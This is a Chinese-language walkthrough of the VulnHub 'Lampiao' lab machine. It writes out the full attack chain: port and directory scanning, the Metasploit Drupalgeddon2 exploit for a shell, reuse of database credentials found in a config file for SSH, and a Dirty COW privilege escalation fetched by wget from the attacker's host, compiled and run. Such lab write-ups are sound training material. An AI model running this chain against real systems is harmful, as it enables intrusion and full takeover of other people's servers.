2-vulnhub Lampiao实战
简介:
- 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/
- 本次的靶机ip为192.168.3.13(桥接模式自动获取)
一、信息搜集
1.扫描ip
2.扫描端口这里使用nmap进行:
(开始只扫描出来80和22未果,后来反应过来,有可能网站还有其它端口可以访问,因为-sS参数是扫描常用的1000以内的端口号。于是用-p-参数:nmap -p- 192.168.3.13)
这里有三个端口先访问网站,发现如下是个静态页面什么也没有、文件头,源代码中无有效信息。 只好先看1898
nmap -p 1-65535 -sV 192.168.3.13
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 00:56 CST
Nmap scan report for 192.168.3.13
Host is up (0.00046s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
3.扫描目录这里使用dirb:
dirb http://192.168.3.13:1898/
---- Scanning URL: http://192.168.3.13:1898/ ----
==> DIRECTORY: http://192.168.3.13:1898/includes/
+ http://192.168.3.13:1898/index.php (CODE:200|SIZE:11400)
==> DIRECTORY: http://192.168.3.13:1898/misc/
==> DIRECTORY: http://192.168.3.13:1898/modules/
==> DIRECTORY: http://192.168.3.13:1898/profiles/
+ http://192.168.3.13:1898/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.3.13:1898/scripts/
+ http://192.168.3.13:1898/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.3.13:1898/sites/
==> DIRECTORY: http://192.168.3.13:1898/themes/
+ http://192.168.3.13:1898/web.config (CODE:200|SIZE:2200)
+ http://192.168.3.13:1898/xmlrpc.php (CODE:200|SIZE:42)
4.相关信息:
内容管理系统(CMS)
Drupal 7
Web 服务器
Apache 2.4.7
编程语言
PHP 5.5.9
操作系统
Ubuntu
JavaScript 库
jQuery 1.4.4
二、进行getshell
1.1898端口查看录音 对网站进行信息搜集
这里访问首页发现最下面有一个文件LuizGonzaga-LampiaoFalou.mp3进行访问:http://192.168.3.13:1898/LuizGonzaga-LampiaoFalou.mp3
是一段录音似乎没什么用
继续对网站进行信息搜集:
2.发现有robots.txt
进行查看一波发现http://192.168.3.13:1898/includes/处有目录遍历
再include里面看见有什么数据库的配置文件好像没什么用…因为之前信息搜集时发现他框架是Drupal 7所以这里可以进行一波漏洞搜集,百度查一下:
(使用2018年这个漏洞。Drupal 在3月28日爆出的一个远程代码执行漏洞,CVE编号CVE-2018-7600)分析及 PoC 构造:
3.使用msf
试一下:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.3.13
set RPORT 1898
shell
成功获取shell!
三、提权
1.进入Python交换式Shell:
执行shell获取交互式命令,由于我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
2.根据网上大佬的文章可以发现有四个没有发现的文件:
这里我们可以在本机电脑上进行查看(使用scp这里将不再进行描述)
查看结果:
qrc.png:一个二维码,扫出来的结果是 Try harger! muahuahuahua,被作者鼓励了。。
audio.m4a:提示为user tiago,说明要先找到用户tiago的密码这里先放到一边
uizGonzaga-LampiaoFalou.mp3:一首音乐刚刚听过,没有什么东西
lampiao.jpg:一张牛仔的图片,丢入binwlak中未发现有什么隐写
3.找到了用户名 查看配置文件(不知道密码)
但是我们不知道密码在前面我们看到了有databade所以说一般网站有数据库的配置文件
我们继续翻找配置信息在/var/www/html/sites/default文件当中我们在settings.php找到了配置文件
4.登录mysql
既然知道了数据库的账号和密码 我们可以登录一波:
mysql -u drupaluser -p
mysql -u drupaluser -p
Enter password: Virgulino
(这里有几个思路 我们可以在数据库当中查看密码 也可以自行使用九头蛇爆破 )
因为之前在配置文件当中看到了密码所以使用密码 Virgulino尝试登录一下刚刚提示的tiago用户,最后试了试mysql数据库root的密码,结果密码也是tiago的登陆密码,成功获取Mysql数据库的root权限。
5.ssh登录
既然我们已经知道了用户名密码 那么我们现在ssh可以进行登录:
账号:tiago
密码:Virgulino
6.登录成功、查看版本信息
继续进行信息搜集:
uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
7.这里使用脏牛提权
searchsploit dirty cow pri esc
查找脏牛提权的exp
searchsploit -m 40847.cpp
-m 复制到当前目录下
进行下载:
搭建http服务进行EXP文件传输
python3 -m http.server 8000
进行下载:wget http://192.168.3.12:8000/40847.cpp
8.进行编译生成一个 dcow文件:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
进行执行:
成功提权!!!!
9.找到flag
cd /root
root@lampiao:~# ls
flag.txt
root@lampiao:~# cat flag
cat: flag: No such file or directory
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366
root@lampiao:~#
大功告成!!!
